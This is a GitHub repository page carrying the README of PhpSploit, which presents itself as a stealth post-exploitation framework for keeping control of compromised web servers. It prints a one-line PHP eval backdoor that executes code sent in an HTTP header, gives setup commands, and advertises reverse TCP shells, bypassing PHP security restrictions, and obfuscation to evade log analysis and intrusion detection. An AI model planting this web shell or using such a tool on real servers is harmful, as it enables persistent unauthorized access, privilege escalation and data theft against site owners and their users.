Skip to content

ohnoa/phpsploit

 
 

Repository files navigation

PhpSploit: Furtive post-exploitation framework

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.

travis build codacy code quality lgtm alerts codecov coverage codeclimate maintainability license requires.io requirements

phpsploit demo


Overview

The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Quick Start

git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"

Features

  • Efficient: More than 20 plugins to automate post-exploitation tasks

    • Run commands and browse filesystem, bypassing PHP security restrictions
    • Upload/Download files between client and target
    • Edit remote files through local text editor
    • Run SQL console on target system
    • Spawn reverse TCP shells
  • Stealth: The framework is made by paranoids, for paranoids

    • Nearly invisible by log analysis and NIDS signature detection
    • Safe-mode and common PHP security restrictions bypass
    • Communications are hidden in HTTP Headers
    • Loaded payloads are obfuscated to bypass NIDS
    • http/https/socks4/socks5 Proxy support
  • Convenient: A robust interface with many crucial features

    • Detailed help for any command or option (type help)
    • Cross-platform on both the client and the server.
    • Powerful interface with completion and multi-command support
    • Session saving/loading feature & persistent history
    • Multi-request support for large payloads (such as uploads)
    • Provides a powerful, highly configurable settings engine
    • Each setting, such as user-agent has a polymorphic mode
    • Customisable environment variables for plugin interaction
    • Provides a complete plugin development API

Supported platforms (as attacker):

  • GNU/Linux
  • Mac OS X

Supported platforms (as target):

  • GNU/Linux
  • BSD Like
  • Mac OS X
  • Windows NT

Contributors

Thanks goes to these people (emoji key):

nil0x42
nil0x42

💻 🚇 🔌 ⚠️
shiney-wh
shiney-wh

💻 🔌
Wannes Rombouts
Wannes Rombouts

💻 🚧
Amine Ben Asker
Amine Ben Asker

💻 🚧
jose nazario
jose nazario

📖 🐛
Sujit Ghosal
Sujit Ghosal

📝
Zerdoumi
Zerdoumi

🐛
tristandostaler
tristandostaler

🐛
Rohan Tarai
Rohan Tarai

🐛

This project follows the all-contributors specification. Contributions of any kind welcome!

About

Stealth post-exploitation framework

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages

  • Python 76.0%
  • Shell 13.2%
  • PHP 10.6%
  • C 0.2%